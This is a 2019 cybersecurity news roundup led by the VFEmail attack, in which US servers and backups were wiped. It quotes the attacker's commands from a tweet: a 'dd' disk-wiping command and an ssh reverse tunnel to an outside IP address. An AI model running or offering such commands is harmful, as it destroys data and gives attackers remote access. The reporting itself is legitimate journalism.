Disastrous cyber attack on email provider wipes US servers and backups

Some cyber attacks are so disastrous that there’s no coming back from them. Email provider VFEmail worried that was the case when it said a hacker caused “catastrophic destruction” on Monday by destroying all data on U.S. servers, as well as the backup systems.

On Monday morning, after VFEmail’s site, servers, and webmail client went down, VFEmail tweeted:

This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.

— VFEmail.net (@VFEmail) February 11, 2019

A few hours later, VFEmail said it caught a hacker trying to format a backup server:

Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N

— VFEmail.net (@VFEmail) February 11, 2019

VFEmail then tweeted, “I fear all US based data may be lost.” The unknown attacker had wiped all the disks on every server:

At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provideer were intact, and service should be up there.

— VFEmail.net (@VFEmail) February 11, 2019

The hacker was out for blood — “just attack and destroy.”

Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.

— VFEmail.net (@VFEmail) February 11, 2019

In one fell swoop, an attacker had destroyed VFEmail’s “entire infrastructure.” As for the “scary part,” Romero tweeted:

Not ‘A’, an entire infrastructure. Mail hasts, VM hosts,sql server cluster, hosted vms. If they all had one password, sure, but they didn’t. That’s the scary part.

— Havokmon (@Havokmon) February 12, 2019

On Monday, free users were advised to “not attempt to send email” because “there is currently no delivery for free accounts.” The incident page warned: “At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK. If you reconnect your client to your new mailbox, all your local mail will be lost.”

VFEmail service has since been restored, and new mail is being delivered. Today, users were advised, “If you are unable to login, send yourself an email from another location. Receipt of an email creates your new mailbox.” The email provider is discussing possible data recovery options with an unnamed vendor.

As pointed out by Krebs on Security, this is far from the first time that VFEmail has been the victim of a targeted attack. It was disrupted by DDoS attacks in 2015, 2017, and 2018 when Romero tweeted, “After 17 years if I was planning to shut it down, it’d be shut down by me – not script kiddies.”

More cybersecurity news

Researchers devise method to hide malware in Intel systems so antivirus can’t get to it

While we’re on the topic of scary stuff, security researchers came up with a new technique to hide malicious code from security software on systems that have Intel processors by burying the malware in the secure memory of Intel SGX enclaves. In addition to writing a research paper (pdf), the researchers also published proof-of-concept code that can bypass “ASLR, stack canaries, and address sanitizer, the overall exploit process took only 20.8 seconds.”

Websites and companies hacked

Sixteen sites were hacked and then the resulting 617 million account details were stolen and put up for sale on the dark web; the data is selling for less than $20,000 in bitcoin. According to The Register, the hacked sites included 500px, MyFitnessPal, Dubsmash, MyHeritage, Whitepages, Fotolog, ShareThis, HauteLook, 8fit, EyeEm, Artsy, Animoto, BookMate, Armor Games, CoffeeMeetsBagel, and DataCamp.

Speaking of hacked, Dunkin Donuts admitted (pdf) to suffering another credential stuffing attack – it’s the second time in a three-month period.

Also, Truluck’s Seafood, Steak & Crab House announced the compromise of payment card information after it was notified by the FBI about potential unauthorized access. Affected customers will have made purchases between November 21, 2018, and December 8, 2018, at the following locations: Houston (Downtown), Houston (The Woodlands), Dallas, Austin (Downtown), Austin (Arboretum), Naples, Southlake, and Chicago.

Apophis Squad hacker faces 11-count federal indictment

Remember in December when hundreds of schools and businesses received fake bomb threat emails? The Justice Department announced that the FBI had arrested a 20-year-old North Carolina man who is part of the hacking group Apophis Squad. Timothy Vaughn faces an 11-count federal indictment that could land him a maximum sentence of 80 years in prison. The second defendant, and 19-year-old alleged leader of the group, was arrested in the U.K. last year and sentenced to three years in prison for making a bogus threat targeting an airliner.

You may remember when the Apophis Squad had bragged:

Feds cant touch us. NCA cant touch us. KEK we the big bois running around the internet with our 1337 bootnet! Come catch us we are untouchable! Living on TOR nodes and Open DNS. Smoking that good stuff with our bois at radware.

— APOPHIS SQUAD (@apophissquadv2) July 18, 2018

Amusing tweets from the week

• “Beg bounty” – new term for the day

I just learned a new term – “beg bounty” ie scanning a network without permission and then asking to be paid for vulnerabilities found

— Quentyn Taylor (@quentynblog) February 13, 2019

• A true, yet funny comment by security expert Jeremiah Grossman in response to the question, “Without using the title of your job, tell me what you do.”

Make people afraid of computers. https://t.co/plVvirBkzD

— Jeremiah Grossman (@jeremiahg) February 13, 2019